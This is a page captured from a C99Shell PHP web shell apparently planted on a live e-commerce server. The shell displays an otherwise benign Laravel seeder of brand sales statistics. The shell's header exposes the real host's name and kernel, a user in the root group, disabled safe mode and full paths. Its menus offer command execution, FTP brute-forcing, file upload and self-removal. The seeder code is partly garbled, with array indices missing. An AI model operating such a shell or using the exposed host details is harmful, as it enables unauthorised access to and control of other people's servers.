!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/database/seeders/   drwxr-xr-x
Free 26.11 GB of 117.98 GB (22.13%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     BrandStatsTableSeeder.php (4.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Database\Seeders;

use 
Illuminate\Database\Seeder;

class 
BrandStatsTableSeeder extends Seeder
{

    
/**
     * Auto generated seed file
     *
     * @return void
     */
    
public function run()
    {
        

        
\DB::table('brand_stats')->delete();
        
        
\DB::table('brand_stats')->insert(array (
            
=> 
            array (
                
'id' => 1,
                
'brand_id' => 29,
                
'count_views' => 0,
                
'count_sales' => 4,
                
'date' => randomDateBefore(5),
            ),
            
=> 
            array (
                
'id' => 2,
                
'brand_id' => 50,
                
'count_views' => 0,
                
'count_sales' => 1,
                
'date' => randomDateBefore(5),
            ),
            
=> 
            array (
                
'id' => 3,
                
'brand_id' => 4,
                
'count_views' => 0,
                
'count_sales' => 1,
                
'date' => randomDateBefore(5),
            ),
            
=> 
            array (
                
'id' => 4,
                
'brand_id' => 18,
                
'count_views' => 0,
                
'count_sales' => 2,
                
'date' => randomDateBefore(5),
            ),
            
=> 
            array (
                
'id' => 5,
                
'brand_id' => 35,
                
'count_views' => 0,
                
'count_sales' => 1,
                
'date' => randomDateBefore(5),
            ),
            
=> 
            array (
                
'id' => 6,
                
'brand_id' => 16,
                
'count_views' => 0,
                
'count_sales' => 4,
                
'date' => randomDateBefore(5),
            ),
            
=> 
            array (
                
'id' => 7,
                
'brand_id' => 14,
                
'count_views' => 0,
                
'count_sales' => 1,
                
'date' => randomDateBefore(5),
            ),
            
=> 
            array (
                
'id' => 9,
                
'brand_id' => 2,
                
'count_views' => 0,
                
'count_sales' => 4,
                
'date' => randomDateBefore(5),
            ),
            
=> 
            array (
                
'id' => 11,
                
'brand_id' => 21,
                
'count_views' => 0,
                
'count_sales' => 2,
                
'date' => randomDateBefore(5),
            ),
            
=> 
            array (
                
'id' => 12,
                
'brand_id' => 8,
                
'count_views' => 0,
                
'count_sales' => 2,
                
'date' => randomDateBefore(5),
            ),
            
10 => 
            array (
                
'id' => 16,
                
'brand_id' => 23,
                
'count_views' => 0,
                
'count_sales' => 1,
                
'date' => randomDateBefore(5),
            ),
            
11 => 
            array (
                
'id' => 18,
                
'brand_id' => 5,
                
'count_views' => 0,
                
'count_sales' => 2,
                
'date' => randomDateBefore(5),
            ),
            
12 => 
            array (
                
'id' => 19,
                
'brand_id' => 22,
                
'count_views' => 0,
                
'count_sales' => 1,
                
'date' => randomDateBefore(5),
            ),
            
13 => 
            array (
                
'id' => 24,
                
'brand_id' => 31,
                
'count_views' => 0,
                
'count_sales' => 1,
                
'date' => randomDateBefore(5),
            ),
            
14 => 
            array (
                
'id' => 28,
                
'brand_id' => 46,
                
'count_views' => 0,
                
'count_sales' => 1,
                
'date' => randomDateBefore(5),
            ),
            
15 => 
            array (
                
'id' => 29,
                
'brand_id' => 38,
                
'count_views' => 0,
                
'count_sales' => 1,
                
'date' => randomDateBefore(5),
            ),
            
16 => 
            array (
                
'id' => 30,
                
'brand_id' => 3,
                
'count_views' => 0,
                
'count_sales' => 1,
                
'date' => randomDateBefore(5),
            ),
        ));
        
        
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0051 ]--